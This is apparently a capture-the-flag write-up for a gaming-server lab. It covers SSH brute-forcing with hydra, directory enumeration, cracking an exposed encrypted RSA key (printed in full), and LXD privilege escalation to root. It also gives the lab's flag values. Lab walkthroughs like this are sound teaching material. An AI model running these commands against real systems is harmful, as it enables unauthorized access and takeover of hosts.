Can you gain access to this gaming server built by amateurs with no experience of web development and take advantage of the deployment system.
Enumerate to see port 22 and 80 open. We don't have creds for 22 to let's peek at 80.
Cool! Looks like a D&D style game.... I'd probably play this
Well, we might have a username here. Let's use that and hydra to check out ssh
hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.113.151 sshWhile we do that, let's also gobuster the web server.
gobuster dir -u http://10.10.113.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtGobuster finds us some stuff, let's make sure we enumerate these two folders fully by doing another gobuster on them. It might be good to add the -x option to search for files too
gobuster dir -u http://10.10.113.151/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,htm,html
Inside /secret we get an RSA key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----
We can download that directly to a file using
wget http://[IP]/secret/SecretKeyI'm going to copy that to a new file called id_rsa so I can play with it, without breaking the original. First we need to use ssh2john to get the hash out of it. If you're not sure where ssh2john is you can run this command to find it:
find / -type f -name ssh2john* 2>/dev/nullRun ssh2john like this:
python ssh2john id_rsa > hashThe we crack that hash with john:
john id_rsa -wordlist=/usr/share/wordlists/rockyou.txtThe password gets found:
Now we want to be able to use the id_rsa file so I'm going to chmod it to 400. We try and connect to ssh like this:
ssh john@[IP] -i id_rsaThat' let's us in. It looks like john is part of the sudo group but his rsa password is different from his login one.
Either way, let's grab the user flag while we're here
What is the user flag? a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e
I was hoping to take advantage of that lxd group but this shell doesn't have internet access. Instead, I've downloaded linpeas on my workstation, hosted it on a python webserver, downloaded it on this client shell and we'll see what's available.
Needing some help figuring out lxc stuff, I hit up a writeup that pointed me here: https://www.hackingarticles.in/lxd-privilege-escalation/
Getting this done was actually quite easy once I found the right resource. We needed to download alpine from our machine and transfer it though as we didn' t have access to github on the remote machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpineHost a python http.server and then transfer the tar.gz that was created
cd /tmp
wget http://[IP]:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
idOnce inside the container, navigate to /mnt/root to see all resources from the host machine.
What is the root flag? 2e337b8c9f3aff0c2b3e8d4e6a7c88fc
Comentarios